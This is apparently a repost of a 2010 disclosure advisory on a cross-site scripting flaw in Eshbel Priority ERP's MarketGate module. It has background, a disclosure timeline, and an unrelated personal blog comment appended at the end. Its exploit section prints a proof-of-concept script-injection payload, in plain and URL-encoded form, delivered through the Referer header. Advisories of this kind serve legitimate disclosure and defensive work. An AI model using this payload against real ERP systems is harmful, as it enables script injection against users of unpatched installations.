Home » 2010 » March » 3 » Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
6:25 AM
Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
==============================
===========
Yaniv Miron aka "Lament" Advisory Feb 27, 2010
Eshbel Priority MarketGate module Cross Site Scripting Vulnerability
=========================================

=====================
I. BACKGROUND
=====================
Priority’s ERP

The features listed below are a selection of some of the functionality
available in a selection of the Priority modules.
BI (Business Intelligence), Purchasing, BPM (Business Process Management),
Manufacturing/Production, GL + Financials, Human Resources,
CRM (Customer Relations Management), Project Management,
Order Processing, System Administration, Service and Customer Support,
SDK (Generators), Inventory Control, User Configuration, WMS

http://www.eshbel.com//ERP-Feature.htm

=====================
II. DESCRIPTION
=====================

A malicious attacker may inject scripts into the Priority’s ERP application using the "Referer" field.

=====================
III. ANALYSIS
=====================

Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious "Referer" field.

=====================
IV. EXPLOIT
=====================

http://example.com/marketgate/PriHtml.dll/WWWxxxxxxxx


Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=>"'><script>alert(31337)</script>&_yyyyyyyy=>"'><script>alert(31337)</script>

-------------------------------------------------------------------------------------------------------------------------------------

Referer: http://example.com/marketgate/priorSysMan.htm

WWWxxxxxxxx=%3E%22%27%3E%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&_yyyyyyyy=%3E%22%27%3E%

3Cscript%3Ealert%2831337%29%3C%2Fscript%3E

=====================
V. DISCLOSURE TIMELINE
=====================

Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
Feb 2010 Public Disclosure

=====================
VI. CREDIT
=====================

Yaniv Miron aka "Lament".
lament@ilhack.org
Views: 1082 | Added by: b1zz4rd | Rating: 0.0/0
Total comments: 1
1  
, "an ordinary life is not good euognh....". Sometimes when I read through your blog I get the sense that you are not content with an ordinary life. That was a bit of an adjustment for me when I got back from Canada but now I love my "ordinary life". I work full time, I teach Zumba a couple days a week, I go to the gym, play on a softball team and spend as much time with my husband as possible when he is not at work (he still works out of town, which is the only part of my life that I don't love). Anyway, I just thought I would share that with you and maybe it will give you something to think about. "Ordinary" isn't so bad!Take Care,Mel

Name *:
Email *:
Code *: